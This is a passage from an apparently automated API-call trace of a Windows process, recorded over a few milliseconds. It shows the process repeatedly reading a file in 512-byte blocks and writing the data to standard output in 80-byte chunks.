lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.615] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType 
(hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.616] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, 
lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, 
lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.617] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, 
lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.618] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.619] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, 
lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: 
lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.620] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.621] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] 
GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 
